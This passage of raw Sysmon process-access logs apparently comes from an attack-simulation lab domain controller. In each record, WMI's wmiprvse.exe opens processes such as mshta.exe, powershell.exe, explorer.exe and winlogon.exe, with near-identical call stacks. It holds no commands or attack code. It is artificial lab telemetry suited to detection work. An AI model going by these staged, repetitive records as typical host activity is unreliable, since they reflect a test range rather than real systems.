+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025191Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535F-6008-5306-00000000A301}5324C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025190Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025189Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025188Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025187Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025186Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025185Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025184Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025183Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025182Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025181Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025180Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025179Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025178Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025177Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025176Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025175Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025174Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025173Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025172Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:29.054{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 